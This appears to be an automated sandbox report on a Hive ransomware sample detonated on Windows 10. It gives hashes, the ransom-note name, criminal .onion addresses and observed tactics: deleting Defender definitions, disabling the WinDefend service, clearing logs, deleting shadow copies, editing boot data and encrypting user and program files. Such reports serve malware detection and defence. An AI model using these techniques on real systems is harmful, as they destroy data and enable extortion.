Analysis
-
max time kernel
130s -
max time network
127s -
platform
windows10_x64 -
resource
win10-en-20211208 -
submitted
12-01-2022 16:59
Static task
static1
Behavioral task
behavioral1
Sample
25f621faa29e7814e8c6d75d3e7fc3f65877d81b5dafb397526b26dcd8d3594d.exe
Resource
win7-en-20211208
General
-
Target
25f621faa29e7814e8c6d75d3e7fc3f65877d81b5dafb397526b26dcd8d3594d.exe
-
Size
2.7MB
-
MD5
583ce06f5812bbb83e7388b58e7498f5
-
SHA1
9e8dafdfea6b79dc3f13b582529caa451f5a6355
-
SHA256
25f621faa29e7814e8c6d75d3e7fc3f65877d81b5dafb397526b26dcd8d3594d
-
SHA512
2db707dbd5137b58f9178de1e963e5a7c13196c2c656c39c9e7d31d70cd28759f46e4b5c2e109f6f44d6fbd07a1bf09c6a720b32e1a2695ecf9fa51b7182f6ce
Malware Config
Extracted
C:\MyEY_HOW_TO_DECRYPT.txt
hive
http://hiveleakdbtnp76ulyhi52eag6c6tyc3xw7ez7iqy6wc34gd2nekazyd.onion/
http://hivecust6vhekztbqgdnkks64ucehqacge3dij3gyrrpdp57zoq3ooqd.onion/
Signatures
-
Deletes Windows Defender Definitions 2 TTPs 1 IoCs
Uses mpcmdrun utility to delete all AV definitions.
Processes:
MpCmdRun.exepid process 604 MpCmdRun.exe -
Hive
A ransomware written in Golang first seen in June 2021.
-
Modifies security service 2 TTPs 1 IoCs
Processes:
reg.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4" reg.exe -
Clears Windows event logs 1 TTPs
-
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
Processes:
bcdedit.exebcdedit.exepid process 1580 bcdedit.exe 3160 bcdedit.exe -
Modifies extensions of user files 16 IoCs
Ransomware generally changes the extension on encrypted files.
Processes:
25f621faa29e7814e8c6d75d3e7fc3f65877d81b5dafb397526b26dcd8d3594d.exedescription ioc process File renamed C:\Users\Admin\Pictures\ConvertUndo.raw => C:\Users\Admin\Pictures\ConvertUndo.raw.6sNAVb1PrgkD_wfXd2yllWRMLSMZRRT7TBWkSpYGKyP_E09cKgYNav00.fayg2 25f621faa29e7814e8c6d75d3e7fc3f65877d81b5dafb397526b26dcd8d3594d.exe File opened for modification C:\Users\Admin\Pictures\ExitDisable.tiff.6sNAVb1PrgkD_wfXd2yllWRMLSMZRRT7TBWkSpYGKyP_qNlJd3YsouQ0.fayg2 25f621faa29e7814e8c6d75d3e7fc3f65877d81b5dafb397526b26dcd8d3594d.exe File renamed C:\Users\Admin\Pictures\GetConvert.raw => C:\Users\Admin\Pictures\GetConvert.raw.6sNAVb1PrgkD_wfXd2yllWRMLSMZRRT7TBWkSpYGKyP_fYUllUM0caM0.fayg2 25f621faa29e7814e8c6d75d3e7fc3f65877d81b5dafb397526b26dcd8d3594d.exe File opened for modification C:\Users\Admin\Pictures\GetConvert.raw.6sNAVb1PrgkD_wfXd2yllWRMLSMZRRT7TBWkSpYGKyP_fYUllUM0caM0.fayg2 25f621faa29e7814e8c6d75d3e7fc3f65877d81b5dafb397526b26dcd8d3594d.exe File renamed C:\Users\Admin\Pictures\UnblockRead.crw => C:\Users\Admin\Pictures\UnblockRead.crw.6sNAVb1PrgkD_wfXd2yllWRMLSMZRRT7TBWkSpYGKyP_Xnx3lhmhmPE0.fayg2 25f621faa29e7814e8c6d75d3e7fc3f65877d81b5dafb397526b26dcd8d3594d.exe File opened for modification C:\Users\Admin\Pictures\ClearUnblock.tif.6sNAVb1PrgkD_wfXd2yllWRMLSMZRRT7TBWkSpYGKyP_FqTs8GjBaJk0.fayg2 25f621faa29e7814e8c6d75d3e7fc3f65877d81b5dafb397526b26dcd8d3594d.exe File opened for modification C:\Users\Admin\Pictures\ConvertFromWatch.tif.6sNAVb1PrgkD_wfXd2yllWRMLSMZRRT7TBWkSpYGKyP_cJn0DEq6Rgg0.fayg2 25f621faa29e7814e8c6d75d3e7fc3f65877d81b5dafb397526b26dcd8d3594d.exe File renamed C:\Users\Admin\Pictures\ExitDisable.tiff => C:\Users\Admin\Pictures\ExitDisable.tiff.6sNAVb1PrgkD_wfXd2yllWRMLSMZRRT7TBWkSpYGKyP_qNlJd3YsouQ0.fayg2 25f621faa29e7814e8c6d75d3e7fc3f65877d81b5dafb397526b26dcd8d3594d.exe File renamed C:\Users\Admin\Pictures\RevokeShow.crw => C:\Users\Admin\Pictures\RevokeShow.crw.6sNAVb1PrgkD_wfXd2yllWRMLSMZRRT7TBWkSpYGKyP_O0kq1w2cnno0.fayg2 25f621faa29e7814e8c6d75d3e7fc3f65877d81b5dafb397526b26dcd8d3594d.exe File opened for modification C:\Users\Admin\Pictures\RevokeShow.crw.6sNAVb1PrgkD_wfXd2yllWRMLSMZRRT7TBWkSpYGKyP_O0kq1w2cnno0.fayg2 25f621faa29e7814e8c6d75d3e7fc3f65877d81b5dafb397526b26dcd8d3594d.exe File opened for modification C:\Users\Admin\Pictures\UnblockRead.crw.6sNAVb1PrgkD_wfXd2yllWRMLSMZRRT7TBWkSpYGKyP_Xnx3lhmhmPE0.fayg2 25f621faa29e7814e8c6d75d3e7fc3f65877d81b5dafb397526b26dcd8d3594d.exe File renamed C:\Users\Admin\Pictures\UnregisterUninstall.raw => C:\Users\Admin\Pictures\UnregisterUninstall.raw.6sNAVb1PrgkD_wfXd2yllWRMLSMZRRT7TBWkSpYGKyP_o4__AM0vRh00.fayg2 25f621faa29e7814e8c6d75d3e7fc3f65877d81b5dafb397526b26dcd8d3594d.exe File opened for modification C:\Users\Admin\Pictures\UnregisterUninstall.raw.6sNAVb1PrgkD_wfXd2yllWRMLSMZRRT7TBWkSpYGKyP_o4__AM0vRh00.fayg2 25f621faa29e7814e8c6d75d3e7fc3f65877d81b5dafb397526b26dcd8d3594d.exe File renamed C:\Users\Admin\Pictures\ClearUnblock.tif => C:\Users\Admin\Pictures\ClearUnblock.tif.6sNAVb1PrgkD_wfXd2yllWRMLSMZRRT7TBWkSpYGKyP_FqTs8GjBaJk0.fayg2 25f621faa29e7814e8c6d75d3e7fc3f65877d81b5dafb397526b26dcd8d3594d.exe File renamed C:\Users\Admin\Pictures\ConvertFromWatch.tif => C:\Users\Admin\Pictures\ConvertFromWatch.tif.6sNAVb1PrgkD_wfXd2yllWRMLSMZRRT7TBWkSpYGKyP_cJn0DEq6Rgg0.fayg2 25f621faa29e7814e8c6d75d3e7fc3f65877d81b5dafb397526b26dcd8d3594d.exe File opened for modification C:\Users\Admin\Pictures\ConvertUndo.raw.6sNAVb1PrgkD_wfXd2yllWRMLSMZRRT7TBWkSpYGKyP_E09cKgYNav00.fayg2 25f621faa29e7814e8c6d75d3e7fc3f65877d81b5dafb397526b26dcd8d3594d.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Drops file in Program Files directory 64 IoCs
Processes:
25f621faa29e7814e8c6d75d3e7fc3f65877d81b5dafb397526b26dcd8d3594d.exedescription ioc process File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\contrast-white\HxCalendarMediumTile.scale-125.png 25f621faa29e7814e8c6d75d3e7fc3f65877d81b5dafb397526b26dcd8d3594d.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\en-il\MyEY_HOW_TO_DECRYPT.txt 25f621faa29e7814e8c6d75d3e7fc3f65877d81b5dafb397526b26dcd8d3594d.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\update_tracking\org-openide-actions.xml.6sNAVb1PrgkD_wfXd2yllWRMLSMZRRT7TBWkSpYGKyP_YjkjK1zNz6k0.fayg2 25f621faa29e7814e8c6d75d3e7fc3f65877d81b5dafb397526b26dcd8d3594d.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\profiler\update_tracking\org-netbeans-lib-profiler.xml.6sNAVb1PrgkD_wfXd2yllWRMLSMZRRT7TBWkSpYGKyP_g3YGpliQpV80.fayg2 25f621faa29e7814e8c6d75d3e7fc3f65877d81b5dafb397526b26dcd8d3594d.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsAlarms_10.1702.333.0_x64__8wekyb3d8bbwe\Assets\snooze.png 25f621faa29e7814e8c6d75d3e7fc3f65877d81b5dafb397526b26dcd8d3594d.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\contrast-white\GenericMailMediumTile.scale-200.png 25f621faa29e7814e8c6d75d3e7fc3f65877d81b5dafb397526b26dcd8d3594d.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.intro.nl_zh_4.4.0.v20140623020002.jar.6sNAVb1PrgkD_wfXd2yllWRMLSMZRRT7TBWkSpYGKyP_xIes2C3GJjM0.fayg2 25f621faa29e7814e8c6d75d3e7fc3f65877d81b5dafb397526b26dcd8d3594d.exe File opened for modification C:\Program Files\Windows Media Player\ja-JP\mpvis.dll.mui 25f621faa29e7814e8c6d75d3e7fc3f65877d81b5dafb397526b26dcd8d3594d.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\zh-cn\ui-strings.js.6sNAVb1PrgkD_wfXd2yllWRMLSMZRRT7TBWkSpYGKyP_56X9YDnq9T80.fayg2 25f621faa29e7814e8c6d75d3e7fc3f65877d81b5dafb397526b26dcd8d3594d.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\da-dk\MyEY_HOW_TO_DECRYPT.txt 25f621faa29e7814e8c6d75d3e7fc3f65877d81b5dafb397526b26dcd8d3594d.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.10252.0_x64__8wekyb3d8bbwe\Assets\FileIcons\FileLogoExtensions.targetsize-64.png 25f621faa29e7814e8c6d75d3e7fc3f65877d81b5dafb397526b26dcd8d3594d.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsCamera_2017.125.40.0_x64__8wekyb3d8bbwe\Assets\WindowsIcons\WindowsCameraAppList.targetsize-96_altform-unplated.png 25f621faa29e7814e8c6d75d3e7fc3f65877d81b5dafb397526b26dcd8d3594d.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Playstore\cs_get.svg.6sNAVb1PrgkD_wfXd2yllWRMLSMZRRT7TBWkSpYGKyP_YWM-xxoZpJo0.fayg2 25f621faa29e7814e8c6d75d3e7fc3f65877d81b5dafb397526b26dcd8d3594d.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\sl-si\ui-strings.js.6sNAVb1PrgkD_wfXd2yllWRMLSMZRRT7TBWkSpYGKyP_N48kz_S-KhI0.fayg2 25f621faa29e7814e8c6d75d3e7fc3f65877d81b5dafb397526b26dcd8d3594d.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\uk-ua\ui-strings.js.6sNAVb1PrgkD_wfXd2yllWRMLSMZRRT7TBWkSpYGKyP_CLyQYkX5yas0.fayg2 25f621faa29e7814e8c6d75d3e7fc3f65877d81b5dafb397526b26dcd8d3594d.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.Office.OneNote_17.7668.58071.0_x64__8wekyb3d8bbwe\images\1851_32x32x32.png 25f621faa29e7814e8c6d75d3e7fc3f65877d81b5dafb397526b26dcd8d3594d.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.8.204.0_x64__kzf8qxf38zg5c\SkypeApp\Designs\Emoticons\large\dog.png 25f621faa29e7814e8c6d75d3e7fc3f65877d81b5dafb397526b26dcd8d3594d.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.8.204.0_x64__kzf8qxf38zg5c\SkypeApp\Designs\Emoticons\small\yes.png 25f621faa29e7814e8c6d75d3e7fc3f65877d81b5dafb397526b26dcd8d3594d.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.XboxSpeechToTextOverlay_1.14.2002.0_x64__8wekyb3d8bbwe\AppxMetadata\CodeIntegrity.cat 25f621faa29e7814e8c6d75d3e7fc3f65877d81b5dafb397526b26dcd8d3594d.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\PAPYRUS\THMBNAIL.PNG.6sNAVb1PrgkD_wfXd2yllWRMLSMZRRT7TBWkSpYGKyP_HcI12rm-7Fo0.fayg2 25f621faa29e7814e8c6d75d3e7fc3f65877d81b5dafb397526b26dcd8d3594d.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsAlarms_10.1702.333.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\AlarmsBadge.scale-100.png 25f621faa29e7814e8c6d75d3e7fc3f65877d81b5dafb397526b26dcd8d3594d.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\tl.gif.6sNAVb1PrgkD_wfXd2yllWRMLSMZRRT7TBWkSpYGKyP_Ij5-2TZ_N-40.fayg2 25f621faa29e7814e8c6d75d3e7fc3f65877d81b5dafb397526b26dcd8d3594d.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\images\rhp_world_icon_2x.png.6sNAVb1PrgkD_wfXd2yllWRMLSMZRRT7TBWkSpYGKyP_Kknn9XxJp980.fayg2 25f621faa29e7814e8c6d75d3e7fc3f65877d81b5dafb397526b26dcd8d3594d.exe File opened for modification C:\Program Files\7-Zip\Lang\hr.txt.6sNAVb1PrgkD_wfXd2yllWRMLSMZRRT7TBWkSpYGKyP_KzNTLt6yQ0k0.fayg2 25f621faa29e7814e8c6d75d3e7fc3f65877d81b5dafb397526b26dcd8d3594d.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\ADDINS\PowerPivot Excel Add-in\Cartridges\Informix.xsl.6sNAVb1PrgkD_wfXd2yllWRMLSMZRRT7TBWkSpYGKyP_tjg-o2N9eH80.fayg2 25f621faa29e7814e8c6d75d3e7fc3f65877d81b5dafb397526b26dcd8d3594d.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000027\assets\Icons\CancelGlyph.16.GrayF.png.6sNAVb1PrgkD_wfXd2yllWRMLSMZRRT7TBWkSpYGKyP_ctjZqlq9_4I0.fayg2 25f621faa29e7814e8c6d75d3e7fc3f65877d81b5dafb397526b26dcd8d3594d.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\ECLIPSE\THMBNAIL.PNG.6sNAVb1PrgkD_wfXd2yllWRMLSMZRRT7TBWkSpYGKyP_n1kC6pWPWS40.fayg2 25f621faa29e7814e8c6d75d3e7fc3f65877d81b5dafb397526b26dcd8d3594d.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\tr-tr\ui-strings.js.6sNAVb1PrgkD_wfXd2yllWRMLSMZRRT7TBWkSpYGKyP_qJ0ZSxE6MLI0.fayg2 25f621faa29e7814e8c6d75d3e7fc3f65877d81b5dafb397526b26dcd8d3594d.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\LogoImages\WinWordLogo.contrast-white_scale-80.png.6sNAVb1PrgkD_wfXd2yllWRMLSMZRRT7TBWkSpYGKyP_hr28k-k8PzA0.fayg2 25f621faa29e7814e8c6d75d3e7fc3f65877d81b5dafb397526b26dcd8d3594d.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\S_IlluDCFilesEmpty_180x180.svg.6sNAVb1PrgkD_wfXd2yllWRMLSMZRRT7TBWkSpYGKyP_-7vNXyV189g0.fayg2 25f621faa29e7814e8c6d75d3e7fc3f65877d81b5dafb397526b26dcd8d3594d.exe File opened for modification C:\Program Files (x86)\Common Files\Adobe\Reader\DC\Linguistics\Providers\Plugins2\AdobeHunspellPlugin\Abbreviations\en_GB\List.txt.6sNAVb1PrgkD_wfXd2yllWRMLSMZRRT7TBWkSpYGKyP_epsLSXRoy1s0.fayg2 25f621faa29e7814e8c6d75d3e7fc3f65877d81b5dafb397526b26dcd8d3594d.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\ru-ru\MyEY_HOW_TO_DECRYPT.txt 25f621faa29e7814e8c6d75d3e7fc3f65877d81b5dafb397526b26dcd8d3594d.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\pl-pl\ui-strings.js.6sNAVb1PrgkD_wfXd2yllWRMLSMZRRT7TBWkSpYGKyP_J8MMLlYYKFg0.fayg2 25f621faa29e7814e8c6d75d3e7fc3f65877d81b5dafb397526b26dcd8d3594d.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\root\ui-strings.js.6sNAVb1PrgkD_wfXd2yllWRMLSMZRRT7TBWkSpYGKyP_MciW4qZaIZQ0.fayg2 25f621faa29e7814e8c6d75d3e7fc3f65877d81b5dafb397526b26dcd8d3594d.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.BingWeather_4.18.56.0_x64__8wekyb3d8bbwe\Assets\AppTiles\WeatherImages\210x173\4.jpg 25f621faa29e7814e8c6d75d3e7fc3f65877d81b5dafb397526b26dcd8d3594d.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.NET.Native.Runtime.1.3_1.3.23901.0_x86__8wekyb3d8bbwe\AppxMetadata\CodeIntegrity.cat 25f621faa29e7814e8c6d75d3e7fc3f65877d81b5dafb397526b26dcd8d3594d.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsCamera_2017.125.40.0_x64__8wekyb3d8bbwe\Assets\Icons\icon_done.png 25f621faa29e7814e8c6d75d3e7fc3f65877d81b5dafb397526b26dcd8d3594d.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\HxCalendarWideTile.scale-150.png 25f621faa29e7814e8c6d75d3e7fc3f65877d81b5dafb397526b26dcd8d3594d.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\1937_24x24x32.png 25f621faa29e7814e8c6d75d3e7fc3f65877d81b5dafb397526b26dcd8d3594d.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\OutlookMailMediumTile.scale-100.png 25f621faa29e7814e8c6d75d3e7fc3f65877d81b5dafb397526b26dcd8d3594d.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\fillandsign.svg.6sNAVb1PrgkD_wfXd2yllWRMLSMZRRT7TBWkSpYGKyP_ubujE1IbqKY0.fayg2 25f621faa29e7814e8c6d75d3e7fc3f65877d81b5dafb397526b26dcd8d3594d.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\POWERPNT_F_COL.HXK.6sNAVb1PrgkD_wfXd2yllWRMLSMZRRT7TBWkSpYGKyP_vhYEu46qc280.fayg2 25f621faa29e7814e8c6d75d3e7fc3f65877d81b5dafb397526b26dcd8d3594d.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.Getstarted_4.5.6.0_x64__8wekyb3d8bbwe\Assets\GetStartedAppList.targetsize-96_altform-unplated_contrast-black.png 25f621faa29e7814e8c6d75d3e7fc3f65877d81b5dafb397526b26dcd8d3594d.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Assets\Fues\Popup_shadow_1.png 25f621faa29e7814e8c6d75d3e7fc3f65877d81b5dafb397526b26dcd8d3594d.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsSoundRecorder_10.1702.301.0_x64__8wekyb3d8bbwe\Assets\VoiceRecorderAppList.contrast-black_targetsize-96_altform-unplated.png 25f621faa29e7814e8c6d75d3e7fc3f65877d81b5dafb397526b26dcd8d3594d.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\VisioStdR_Retail-pl.xrm-ms.6sNAVb1PrgkD_wfXd2yllWRMLSMZRRT7TBWkSpYGKyP_SfuHP0aEGT80.fayg2 25f621faa29e7814e8c6d75d3e7fc3f65877d81b5dafb397526b26dcd8d3594d.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.feature_3.9.1.v20140827-1444\feature.xml.6sNAVb1PrgkD_wfXd2yllWRMLSMZRRT7TBWkSpYGKyP_l-Yk8OlUc5M0.fayg2 25f621faa29e7814e8c6d75d3e7fc3f65877d81b5dafb397526b26dcd8d3594d.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.10252.0_x64__8wekyb3d8bbwe\Assets\contrast-white\AppPackageBadgeLogo.scale-200_contrast-white.png 25f621faa29e7814e8c6d75d3e7fc3f65877d81b5dafb397526b26dcd8d3594d.exe File opened for modification C:\Program Files (x86)\Common Files\System\msadc\de-DE\msadcor.dll.mui.6sNAVb1PrgkD_wfXd2yllWRMLSMZRRT7TBWkSpYGKyP_m1YXZJFjCUA0.fayg2 25f621faa29e7814e8c6d75d3e7fc3f65877d81b5dafb397526b26dcd8d3594d.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\ko-kr\MyEY_HOW_TO_DECRYPT.txt 25f621faa29e7814e8c6d75d3e7fc3f65877d81b5dafb397526b26dcd8d3594d.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Assets\Buttons\Undo\Undo-up.mobile.png 25f621faa29e7814e8c6d75d3e7fc3f65877d81b5dafb397526b26dcd8d3594d.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\OutlookMailSmallTile.scale-400.png 25f621faa29e7814e8c6d75d3e7fc3f65877d81b5dafb397526b26dcd8d3594d.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\contrast-white\HxA-Yahoo-Light.scale-300.png 25f621faa29e7814e8c6d75d3e7fc3f65877d81b5dafb397526b26dcd8d3594d.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_filterselected-dark-hover_32.svg.6sNAVb1PrgkD_wfXd2yllWRMLSMZRRT7TBWkSpYGKyP_rMDPNrJpn3k0.fayg2 25f621faa29e7814e8c6d75d3e7fc3f65877d81b5dafb397526b26dcd8d3594d.exe File opened for modification C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Colors\Green.xml.6sNAVb1PrgkD_wfXd2yllWRMLSMZRRT7TBWkSpYGKyP_KSLlgM8ub4k0.fayg2 25f621faa29e7814e8c6d75d3e7fc3f65877d81b5dafb397526b26dcd8d3594d.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.Messaging_3.26.24002.0_x64__8wekyb3d8bbwe\Assets\starttile.wink.scale-200.png 25f621faa29e7814e8c6d75d3e7fc3f65877d81b5dafb397526b26dcd8d3594d.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsCamera_2017.125.40.0_x64__8wekyb3d8bbwe\Assets\WindowsIcons\WindowsCameraAppList.targetsize-60_altform-unplated.png 25f621faa29e7814e8c6d75d3e7fc3f65877d81b5dafb397526b26dcd8d3594d.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\logo_retina.png.6sNAVb1PrgkD_wfXd2yllWRMLSMZRRT7TBWkSpYGKyP_IUEyHQ8A1zk0.fayg2 25f621faa29e7814e8c6d75d3e7fc3f65877d81b5dafb397526b26dcd8d3594d.exe File opened for modification C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsFeedbackHub_1.1612.10312.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\InsiderHubWideTile.scale-125.png 25f621faa29e7814e8c6d75d3e7fc3f65877d81b5dafb397526b26dcd8d3594d.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.3DBuilder_13.0.10349.0_x64__8wekyb3d8bbwe\Assets\EmbossBitmaps\Sun.png 25f621faa29e7814e8c6d75d3e7fc3f65877d81b5dafb397526b26dcd8d3594d.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.10252.0_x64__8wekyb3d8bbwe\Assets\AppPackageAppList.targetsize-60_altform-unplated.png 25f621faa29e7814e8c6d75d3e7fc3f65877d81b5dafb397526b26dcd8d3594d.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.MSPaint_1.1702.28017.0_x64__8wekyb3d8bbwe\Assets\Logos\StoreLogo\PaintApplist.scale-100.png 25f621faa29e7814e8c6d75d3e7fc3f65877d81b5dafb397526b26dcd8d3594d.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\nb-no\ui-strings.js.6sNAVb1PrgkD_wfXd2yllWRMLSMZRRT7TBWkSpYGKyP_Maw5vkKhUd80.fayg2 25f621faa29e7814e8c6d75d3e7fc3f65877d81b5dafb397526b26dcd8d3594d.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\MobileScanCard_Light.pdf.6sNAVb1PrgkD_wfXd2yllWRMLSMZRRT7TBWkSpYGKyP_nabgR66mXPo0.fayg2 25f621faa29e7814e8c6d75d3e7fc3f65877d81b5dafb397526b26dcd8d3594d.exe -
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
Processes:
vssadmin.exepid process 3616 vssadmin.exe -
Modifies registry class 3 IoCs
Processes:
reg.exereg.exereg.exedescription ioc process Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\EPP reg.exe Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\ContextMenuHandlers\EPP reg.exe Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Drive\shellex\ContextMenuHandlers\EPP reg.exe -
Opens file in notepad (likely ransom note) 1 IoCs
Processes:
notepad.exepid process 2684 notepad.exe -
Runs net.exe
-
Runs ping.exe 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 8 IoCs
Processes:
powershell.exepowershell.exe25f621faa29e7814e8c6d75d3e7fc3f65877d81b5dafb397526b26dcd8d3594d.exepid process 596 powershell.exe 596 powershell.exe 596 powershell.exe 2364 powershell.exe 2364 powershell.exe 2364 powershell.exe 3132 25f621faa29e7814e8c6d75d3e7fc3f65877d81b5dafb397526b26dcd8d3594d.exe 3132 25f621faa29e7814e8c6d75d3e7fc3f65877d81b5dafb397526b26dcd8d3594d.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
wevtutil.exewevtutil.exewevtutil.exewmic.exewmic.exedescription pid process Token: SeSecurityPrivilege 3832 wevtutil.exe Token: SeBackupPrivilege 3832 wevtutil.exe Token: SeSecurityPrivilege 3800 wevtutil.exe Token: SeBackupPrivilege 3800 wevtutil.exe Token: SeSecurityPrivilege 1348 wevtutil.exe Token: SeBackupPrivilege 1348 wevtutil.exe Token: SeIncreaseQuotaPrivilege 764 wmic.exe Token: SeSecurityPrivilege 764 wmic.exe Token: SeTakeOwnershipPrivilege 764 wmic.exe Token: SeLoadDriverPrivilege 764 wmic.exe Token: SeSystemProfilePrivilege 764 wmic.exe Token: SeSystemtimePrivilege 764 wmic.exe Token: SeProfSingleProcessPrivilege 764 wmic.exe Token: SeIncBasePriorityPrivilege 764 wmic.exe Token: SeCreatePagefilePrivilege 764 wmic.exe Token: SeBackupPrivilege 764 wmic.exe Token: SeRestorePrivilege 764 wmic.exe Token: SeShutdownPrivilege 764 wmic.exe Token: SeDebugPrivilege 764 wmic.exe Token: SeSystemEnvironmentPrivilege 764 wmic.exe Token: SeRemoteShutdownPrivilege 764 wmic.exe Token: SeUndockPrivilege 764 wmic.exe Token: SeManageVolumePrivilege 764 wmic.exe Token: 33 764 wmic.exe Token: 34 764 wmic.exe Token: 35 764 wmic.exe Token: 36 764 wmic.exe Token: SeIncreaseQuotaPrivilege 404 wmic.exe Token: SeSecurityPrivilege 404 wmic.exe Token: SeTakeOwnershipPrivilege 404 wmic.exe Token: SeLoadDriverPrivilege 404 wmic.exe Token: SeSystemProfilePrivilege 404 wmic.exe Token: SeSystemtimePrivilege 404 wmic.exe Token: SeProfSingleProcessPrivilege 404 wmic.exe Token: SeIncBasePriorityPrivilege 404 wmic.exe Token: SeCreatePagefilePrivilege 404 wmic.exe Token: SeBackupPrivilege 404 